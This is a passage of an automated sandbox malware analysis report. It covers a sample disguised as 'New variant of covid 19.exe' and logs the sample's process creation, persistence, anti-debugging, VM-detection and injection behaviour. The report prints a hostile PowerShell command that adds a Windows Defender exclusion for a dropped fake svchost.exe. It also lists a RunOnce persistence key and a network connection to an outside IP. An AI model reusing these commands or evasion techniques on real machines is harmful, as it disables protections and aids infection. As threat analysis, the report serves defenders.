      Source: unknown | Process created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process created: C:\Users\user\Desktop\New variant of covid 19.exe C:\Users\user\Desktop\New variant of covid 19.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: New variant of covid 19.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: New variant of covid 19.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

      Data Obfuscation:

      Binary contains a suspicious time stamp
      Source: initial sample | Static PE information: 0xBB7292A1 [Tue Aug 27 16:53:53 2069 UTC]
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Code function: 10_2_06ADB379 push es; iretd
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Code function: 10_2_06ADB980 push es; ret
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Code function: 39_2_0037992C push A9CB66CBh; retf

      Persistence and Installation Behavior:

      Drops PE files with benign system names
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | File created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenX

      Hooking and other Techniques for Hiding and Protection:

      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | File opened: C:\Users\user\Desktop\New variant of covid 19.exe:Zone.Identifier read attributes | delete
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to delay execution (extensive OutputDebugStringW loop)
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe Section loaded: OutputDebugStringW count: 164
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6234
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 962
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3940
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3137
      Source: C:\Users\user\Desktop\New variant of covid 19.exe TID: 6512 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892 Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Users\user\Desktop\New variant of covid 19.exe TID: 6096 Thread sleep time: -35000s >= -30000s
      Source: C:\Users\user\Desktop\New variant of covid 19.exe TID: 7156 Thread sleep count: 40 > 30
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe TID: 6396 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe TID: 6620 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6656 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6452 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\New variant of covid 19.exe Last function: Thread delayed
      Source: powershell.exe, 00000005.00000003.283722125.00000000053E3000.00000004.00000001.sdmp Binary or memory string: Hyper-V
      Source: New variant of covid 19.exe, 00000000.00000003.197444758.000000000598F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX
      Source: svchost.exe, 00000012.00000002.602037143.00000213F4462000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000014.00000002.739231496.0000000001095000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}=
      Source: New variant of covid 19.exe, 00000000.00000003.196962064.00000000059E2000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.600990755.00000213EEC29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000017.00000002.739609013.00000148EC202000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: svchost.exe, 00000017.00000002.739715392.00000148EC228000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.741169171.000002075742A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: powershell.exe, 00000005.00000003.283722125.00000000053E3000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: explorer.exe, 0000000E.00000002.739497998.0000000000F2C000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information queried: ProcessInformation

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process queried: DebugPort
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process queried: DebugPort
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process token adjusted: Debug
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process token adjusted: Debug
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Network Connect: 104.21.31.39 80
      Adds a directory exclusion to Windows Defender
      Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Injects a PE file into a foreign process
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Memory written: C:\Users\user\Desktop\New variant of covid 19.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Memory written: unknown base: 400000 value starts with: 4D5A
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Memory written: unknown base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Process created: C:\Users\user\Desktop\New variant of covid 19.exe C:\Users\user\Desktop\New variant of covid 19.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Process created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Users\user\Desktop\New variant of covid 19.exe VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
